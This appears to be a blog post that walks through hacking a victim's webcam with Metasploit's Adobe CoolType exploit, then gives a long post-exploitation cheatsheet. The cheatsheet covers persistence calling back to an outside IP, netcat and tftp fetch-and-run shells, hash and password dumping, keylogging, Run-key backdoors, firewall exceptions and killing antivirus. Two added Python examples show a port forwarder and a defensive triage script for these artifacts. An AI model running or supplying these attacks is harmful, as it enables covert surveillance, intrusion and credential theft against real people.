hack webcam


Open Metasploit (msfconsole) and run the following commands:


msf > show exploits


msf > use exploit/windows/browser/adobe_cooltype_sing


msf exploit(adobe_cooltype_sing)> set payload windows/meterpreter/reverse_tcp
payload=> windows/meterpreter/reverse_tcp


msf  exploit(adobe_cooltype_sing) > show options


Module options (exploit/windows/browser/adobe_cooltype_sing):


   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                      no        The URI to use for this exploit (default is random)



Payload options (windows/meterpreter/reverse_tcp):


   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port



Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf  exploit(adobe_cooltype_sing) > set SRVHOST 192.168.0.58
SRVHOST => 192.168.0.58
msf  exploit(adobe_cooltype_sing) > set SRVPORT 80
SRVPORT => 80
msf  exploit(adobe_cooltype_sing) > set URIPATH /
URIPATH => /
msf  exploit(adobe_cooltype_sing) > set LHOST 192.168.0.58
LHOST => 192.168.0.58
msf  exploit(adobe_cooltype_sing) > exploit -j

Two things the option listing above makes clear: LHOST is required by the reverse_tcp payload (it is the address the victim's machine connects back to), so it must be set before `exploit -j`, and SRVPORT 80 is a privileged port, so msfconsole has to run as root for the web server to bind it.


Have the victim open http://192.168.0.58/ in their browser. The module serves a PDF that exploits CVE-2010-2883 (the CoolType SING table "uniqueName" stack overflow) in Adobe Reader 9.3.4 and earlier, so a session only appears if the browser hands the file to a vulnerable Reader plugin; when it does, the background job reports a new Meterpreter session (session 1 if it is the first).


msf  exploit(adobe_cooltype_sing) > sessions -i 1


meterpreter > run webcam


and you will get the victim's webcam image. On current Meterpreter builds the `webcam` script has been replaced by built-in commands: `webcam_list` enumerates cameras, `webcam_snap -i 1` takes a snapshot and `webcam_stream` streams live video.


Metasploit Cheatsheet




use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST rmccurdy.com
set LPORT 21
set ExitOnSession false
# set AutoRunScript <script and arguments to run automatically on every new session>, e.g.:
set AutoRunScript persistence -r 75.139.158.51 -p 21 -A -X -i 30

exploit -j -z

_________________________________________________________________

# file_autopwn
rm -Rf /tmp/1
mkdir /tmp/1
rm -Rf ~/.msf3

wget -O /tmp/file3.pdf https://www1.nga.mil/Newsroom/PressR...s/nga10_02.pdf

./msfconsole

db_driver sqlite3
db_create pentest11
setg LHOST 75.139.158.51
setg LPORT 21
setg SRVPORT 21
setg LPORT_WIN32 21

setg INFILENAME /tmp/file3.pdf

use auxiliary/server/file_autopwn

set OUTPATH /tmp/1

set URIPATH /msf
set SSL true
set ExitOnSession false
set PAYLOAD windows/meterpreter/reverse_tcp
setg PAYLOAD windows/meterpreter/reverse_tcp
set AutoRunScript persistence -r 75.139.158.51 -p 21 -A -X -i 30
run

__________________________________________________________________

# shows all the scripts
run [tab]
__________________________________________________________________

# persistence (broken if -r is given a DNS name; use an IP address)
run persistence -r 75.139.158.51 -p 21 -A -X -i 30

__________________________________________________________________

run get_pidgin_creds

idletime
sysinfo

__________________________________________________________________

# SYSTEM shell: migrate into a process running as SYSTEM (pick its PID from `ps`), then spawn a shell
migrate 376
shell
__________________________________________________________________

# token hijacking (`list_tokens -u` shows which tokens are available to impersonate)
use incognito
impersonate_token "NT AUTHORITY\\SYSTEM"
__________________________________________________________________

# escalate to system
use priv
getsystem
__________________________________________________________________

# -H hidden window, -c channelized I/O, -i interact with the process, -t run with the currently impersonated token
execute -f cmd.exe -H -c -i -t
execute -f cmd.exe -i -t
__________________________________________________________________

# list top used apps
run prefetchtool -x 20
__________________________________________________________________

# list installed apps

run prefetchtool -p
__________________________________________________________________

run get_local_subnets

__________________________________________________________________

# find and download files

run search_dwld "%USERPROFILE%\\my documents" passwd
run search_dwld "%USERPROFILE%\\desktop" passwd
run search_dwld "%USERPROFILE%\\my documents" office
run search_dwld "%USERPROFILE%\\desktop" office

__________________________________________________________________

# alternate

download -r "%USERPROFILE%\\desktop" ~/
download -r "%USERPROFILE%\\my documents" ~/
__________________________________________________________________

# alternative: spawn a shell directly (runs under the current token, which need not be SYSTEM)

# execute -f cmd.exe -H -c -i -t
__________________________________________________________________

# runs a batch of local enumeration commands (wmic etc.) and saves the output

run winenum


# rev shell the hard way
run scheduleme -m 1 -u /tmp/nc.exe -o "-e cmd.exe -L -p 8080"
__________________________________________________________________

# Example: schedule a task on a remote host that fetches netcat via tftp and then starts it as a bind-shell backdoor
run schtasksabuse-dev -t 192.168.1.7 -c "tftp -i 192.168.1.8 GET nc.exe,nc -L -p 8080 -e cmd.exe" -d 4
run schtasksabuse -t 192.168.1.7 -c "tftp -i 192.168.1.8 GET nc.exe,nc -L -p 8080 -e cmd.exe" -d 4
__________________________________________________________________

# vnc / port fwd for linux
run vnc
__________________________________________________________________
# priv esc
run kitrap0d

__________________________________________________________________

run getgui
__________________________________________________________________

# somewhat broken; search for "sdt cleaner" and NtTerminateProcess for the hook it trips over
run killav

run winenum

run memdump

run screen_unlock
__________________________________________________________________

# netcat-style bind shell (system32.exe) launched from the Run key, plus a firewall exception for it
upload /tmp/system32.exe C:\\windows\\system32\\
reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v system32 -d "C:\\windows\\system32\\system32.exe -Ldp 455 -e cmd.exe"
reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v system32
# XP-era firewall exception list; value data for an entry takes the form "<path>:*:Enabled:<name>"
reg enumkey -k HKLM\\system\\controlset001\\services\\sharedaccess\\parameters\\firewallpolicy\\standardprofile\\authorizedapplications\\list
reg setval -k HKLM\\system\\controlset001\\services\\sharedaccess\\parameters\\firewallpolicy\\standardprofile\\authorizedapplications\\list -v sys
reg queryval -k HKLM\\system\\controlset001\\services\\sharedaccess\\parameters\\firewallpolicy\\standardprofile\\authorizedapplications\\list -v system32
upload /neo/wallpaper1.bmp "C:\\documents and settings\\pentest3\\local settings\\application data\\microsoft\\"

__________________________________________________________________

getuid
ps
getpid
keyscan_start
keyscan_dump
migrate 520
# portfwd add -l <local port> -p <remote port> -r <remote host> [-L <local bind address>]
portfwd add -L 104.4.4 -l 6666 -r 192.168.1.1 -p 80
portfwd add -L 192.168.1.1 -l -r 10.5.5.5 -p 6666
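What `portfwd add` actually does, as an added example that is not part of the cheatsheet: a small user-space TCP forwarder in Python with the same -L/-l/-r/-p semantics, so that a connection to the local port is relayed to a host that only the compromised machine can reach. The loopback echo service stands in for the pivot target (the 192.168.1.1:80 of the command above); its prefix, the port numbers and the payload are constructed for the demo.

```python
import socket
import threading

# Added example, not from the cheatsheet: a minimal user-space equivalent of Meterpreter's
#   portfwd add -L <bind addr> -l <local port> -r <remote host> -p <remote port>
# Connections to <bind addr>:<local port> are relayed to <remote host>:<remote port> as seen
# from the relaying host, which is how a pivot reaches hosts only it can route to.


def _pump(src, dst):
    """Copy bytes src -> dst until EOF, then half-close dst so the far end sees the EOF too."""
    try:
        while True:
            chunk = src.recv(4096)
            if not chunk:
                break
            dst.sendall(chunk)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def _relay(client, remote_host, remote_port):
    """Service one accepted connection: open the remote side and pump both directions."""
    try:
        remote = socket.create_connection((remote_host, remote_port), timeout=5)
    except OSError:
        client.close()
        return
    remote.settimeout(None)  # connect timeout only; idle relays must not time out
    up = threading.Thread(target=_pump, args=(client, remote), daemon=True)
    up.start()
    _pump(remote, client)  # remote -> client in this thread
    up.join()
    client.close()
    remote.close()


def portfwd_add(local_port, remote_host, remote_port, bind_addr="127.0.0.1"):
    """Start the forwarder; returns the listening socket (close it to stop accepting)."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    listener.bind((bind_addr, local_port))  # port 0 lets the OS pick a free port
    listener.listen(8)

    def accept_loop():
        while True:
            try:
                client, _ = listener.accept()
            except OSError:  # listener closed
                return
            threading.Thread(target=_relay, args=(client, remote_host, remote_port),
                             daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return listener


def start_echo_target():
    """Constructed stand-in for the pivot target: echoes every chunk back with an 'echo:' prefix."""
    target = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    target.bind(("127.0.0.1", 0))
    target.listen(1)

    def serve():
        while True:
            try:
                conn, _ = target.accept()
            except OSError:
                return
            with conn:
                while True:
                    data = conn.recv(4096)
                    if not data:
                        break
                    conn.sendall(b"echo:" + data)

    threading.Thread(target=serve, daemon=True).start()
    return target


def demo(payload=b"GET / HTTP/1.0\r\n\r\n"):
    """Send payload through the forwarder to the target and return what came back."""
    target = start_echo_target()
    fwd = portfwd_add(0, "127.0.0.1", target.getsockname()[1])
    with socket.create_connection(fwd.getsockname(), timeout=5) as c:
        c.sendall(payload)
        c.shutdown(socket.SHUT_WR)  # signal EOF so both halves of the relay tear down cleanly
        out = b""
        while True:
            data = c.recv(4096)
            if not data:
                break
            out += data
    fwd.close()
    target.close()
    return out


if __name__ == "__main__":
    print(demo())
```

The half-close in `_pump` is the detail that matters: without propagating EOF in each direction the relay would hang open after one side finished, which is also why a real pivot leaves a visible, long-lived connection on the relaying host.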
__________________________________________________________________

shell
run myremotefileserver_mserver -h
run myremotefileserver_mserver -p 8787
__________________________________________________________________

run msf_bind

run msf_bind -p 1975
rev2self
getuid
__________________________________________________________________

getuid


enumdesktops
grabdesktop

run deploymsf -f framework-3.3-dev.exe

run hashdump
run metsvc
run scraper
run checkvm
run keylogrecorder
run netenum -fl -hl localhostlist.txt -d google.com
run netenum -rl -r 10.192.0.50-10.192.0.254
run netenum -st -d google.com
run netenum -ps -r 10.192.0.50-254

___________________________________________________________________

# Windows Login Brute Force Meterpreter Script

run winbf -h
___________________________________________________________________

# upload a script or executable and run it

uploadexec

___________________________________________________________________

# Using Payload As A Backdoor from a shell


# Run-key persistence, an `at` job and a SCHTASKS job (as SYSTEM, every 45 minutes) that relaunch the payload.
# `start` treats its first quoted argument as a window title, so pass an empty "" title before the quoted path.
REG add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v firewall /t REG_SZ /d "c:\windows\system32\metabkdr.exe" /f
at 19:00 /every:M,T,W,Th,F cmd /c start "" "%USERPROFILE%\metabkdr.exe"
SCHTASKS /Create /RU "SYSTEM" /SC MINUTE /MO 45 /TN FIREWALL /TR "%USERPROFILE%\metabkdr.exe" /ED 11/11/2011
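The artifacts these lines leave behind (a Run value, an `at` job and a SCHTASKS task running as SYSTEM), together with the Run-key listener and firewall exception written earlier with `reg setval`, are exactly what a responder triages first. As an added example that is not part of the cheatsheet, the Python below parses constructed `reg query` and `schtasks /query /fo CSV /v` output seeded with those artifacts and flags netcat-style listener flags, binaries run as SYSTEM from user-writable paths and executables named after Windows directories. The host name PENTEST3, the benign entries used for contrast, the trimmed CSV columns and the heuristics are assumptions.

```python
import csv
import io
import re

# Constructed sample of `reg query` output for the two keys the cheatsheet writes to: the Run key
# and the XP-era firewall exception list. The benign entries are invented for contrast.
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    VMware User Process    REG_SZ    "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" -n vmusr
    system32    REG_SZ    C:\windows\system32\system32.exe -Ldp 455 -e cmd.exe

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
    C:\Program Files\Messenger\msmsgs.exe    REG_SZ    C:\Program Files\Messenger\msmsgs.exe:*:Enabled:Windows Messenger
    C:\windows\system32\system32.exe    REG_SZ    C:\windows\system32\system32.exe:*:Enabled:system32
"""

# Constructed, column-trimmed sample of `schtasks /query /fo CSV /v` (hypothetical host PENTEST3),
# containing the task the SCHTASKS line creates and the job the `at` line creates.
SAMPLE_SCHTASKS_CSV = r'''"HostName","TaskName","Task To Run","Run As User","Schedule Type","Repeat: Every"
"PENTEST3","\Microsoft\Windows\Defrag\ScheduledDefrag","%windir%\system32\defrag.exe -c","SYSTEM","Weekly","N/A"
"PENTEST3","\FIREWALL","C:\Documents and Settings\pentest3\metabkdr.exe","SYSTEM","Minute","0 Hour(s), 45 Minute(s)"
"PENTEST3","\At1","cmd /c start """" ""C:\Documents and Settings\pentest3\metabkdr.exe""","SYSTEM","Weekly","N/A"
'''

REG_VALUE = re.compile(r"^\s+(.+?)\s{2,}(REG_\w+)\s{2,}(.*)$")
NC_SHELL = re.compile(r"(?<!\S)-e\s+\S*cmd(?:\.exe)?(?!\S)", re.I)  # nc -e cmd.exe
NC_LISTEN = re.compile(r"(?<!\S)-[A-Za-z]*[lL][A-Za-z]*(?!\S)")     # -l / -L / -Ldp style flags
NC_PORT = re.compile(r"(?<!\S)-[A-Za-z]*p\s*\d+(?!\S)")              # -p 8080 / -Ldp 455
USER_WRITABLE = re.compile(r"\\(?:Documents and Settings|Users|Temp)\\|%USERPROFILE%|%TEMP%", re.I)
MASQUERADE = {"system32", "syswow64", "windows", "winnt"}  # binaries named after system directories


def command_reasons(cmd):
    """Heuristic reasons a Run value, firewall path or 'Task To Run' command looks like a backdoor."""
    reasons = []
    if NC_SHELL.search(cmd):
        reasons.append("spawns cmd.exe via -e (netcat-style shell)")
    if NC_LISTEN.search(cmd) and NC_PORT.search(cmd):
        reasons.append("listens on a TCP port")
    if USER_WRITABLE.search(cmd):
        reasons.append("runs a binary from a user-writable location")
    exe = re.search(r'([^\\/\s"]+)\.exe', cmd, re.I)  # basename of the first .exe in the command
    if exe and exe.group(1).lower() in MASQUERADE:
        reasons.append("binary named after a Windows directory (%s.exe)" % exe.group(1))
    return reasons


def parse_reg_query(text):
    """Yield (key, value name, type, data) tuples from `reg query` output."""
    key = None
    for line in text.splitlines():
        if line.startswith("HKEY_"):
            key = line.strip()
            continue
        m = REG_VALUE.match(line)
        if key and m:
            yield key, m.group(1), m.group(2), m.group(3)


def triage(reg_text=SAMPLE_REG_QUERY, schtasks_csv=SAMPLE_SCHTASKS_CSV):
    """Return a list of findings, each {'source', 'name', 'reasons'}, in input order."""
    findings = []
    for key, name, _type, data in parse_reg_query(reg_text):
        if key.lower().endswith(r"\currentversion\run"):
            reasons = command_reasons(data)
            if reasons:
                findings.append({"source": "Run key", "name": name, "reasons": reasons})
        elif key.lower().endswith(r"\authorizedapplications\list"):
            # value data is "<path>:*:Enabled|Disabled:<display name>"; the path itself contains "C:"
            parts = data.split(":")
            path, state = ":".join(parts[:-3]), parts[-2]
            reasons = command_reasons(path)
            if state.lower() == "enabled" and reasons:
                findings.append({"source": "firewall exception", "name": name, "reasons": reasons})
    for row in csv.DictReader(io.StringIO(schtasks_csv)):
        reasons = command_reasons(row["Task To Run"])
        if row["Run As User"].upper() == "SYSTEM" and reasons:
            findings.append({"source": "scheduled task", "name": row["TaskName"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in triage():
        print("%-18s %-40s %s" % (f["source"], f["name"], "; ".join(f["reasons"])))
```

The heuristics are deliberately narrow: they catch the specific pattern the cheatsheet installs (a renamed netcat with listener flags, a firewall exception for it, and SYSTEM tasks pointing into a user profile), not arbitrary malware, and a real triage would feed it the live `reg query` and `schtasks` output rather than the constructed samples.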

___________________________________________________________________

# kill AV: this does not unload it from memory; that still needs a reboot or killing it in memory (the DarkSpy, Seem and IceSword GUIs can kill the tasks)
catchme.exe -K "c:\Program Files\Kaspersky\avp.exe"
catchme.exe -E "c:\Program Files\Kaspersky\avp.exe"
catchme.exe -O "c:\Program Files\Kaspersky\avp.exe" dummy

1 comment:

  1. Been using Kaspersky protection for a few years now, I'd recommend this antivirus to everybody.
